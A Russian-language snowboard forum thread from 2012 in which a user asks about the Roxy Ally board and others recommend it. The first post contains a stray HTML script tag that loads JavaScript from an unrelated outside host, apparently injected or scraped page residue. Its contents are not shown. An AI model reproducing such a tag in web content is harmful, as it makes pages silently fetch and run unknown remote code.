fanatka 4 Жалоба Опубликовано 30 августа, 2012 здрасте, думаю взять досочку Roxy Ally Snowboard катать собираюсь во всех погодных условиях-от пухляка до гололеда..зима такая у нас + прыгаю немножко, соответственно супер твердость не нужна. Beginner to Advanced All Mountain Freestyle to Freestyle 2011 Good Wood Award Winner Вроде всем хороша: и цена, и победитель и Ол горы стайл. но хочется каких-то реальных отзывов, а еще лучше пощупать дайте потрогать, в общем кто-то видел ее, слышал, юзал? <script src="http://p.datastomp.com/9/3/39.js" async="" type="text/javascript"> Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
SET 20 Жалоба Опубликовано 30 августа, 2012 Отличная доска. Производят на заводе МЕРВИН вместе с ЛибТеками и Гну, так , что если нравится - бери. Качество у неё супер. Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
fanatka 4 Жалоба Опубликовано 30 августа, 2012 а ты пробовал или чисто по описанию? + может знаешь, рокси не тяжелые? пробовал это я сморознула, конечно)))) в реале ее видел где-то? Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
Brazil 1 Жалоба Опубликовано 30 августа, 2012 а ты пробовал или чисто по описанию? + может знаешь, рокси не тяжелые? пробовал это я сморознула, конечно)))) в реале ее видел где-то? Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
Don Sun 484 Жалоба Опубликовано 30 августа, 2012 По личным ощущениям из Roxy модель Ollie Pop легче чем Ally и вообще самая легкая в линейке. Но она чисто фристайловая. Для указанных тобой условий лучше взять Ally. Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
fanatka 4 Жалоба Опубликовано 3 сентября, 2012 (изменено) не, ну понятно, что она любит досочку, которую создали под нее, да еще и по ее дизайну По личным ощущениям из Roxy модель Ollie Pop легче чем Ally и вообще самая легкая в линейке. Но она чисто фристайловая. Для указанных тобой условий лучше взять Ally. поняла, пасиб! всем спасибо большое! пока ждала советов, поняла ,что влюбилась в нее. беру )))) Изменено 3 сентября, 2012 пользователем fanatka Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
wireless 0 Жалоба Опубликовано 3 сентября, 2012 Отличный выбор, доска шикарная. Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты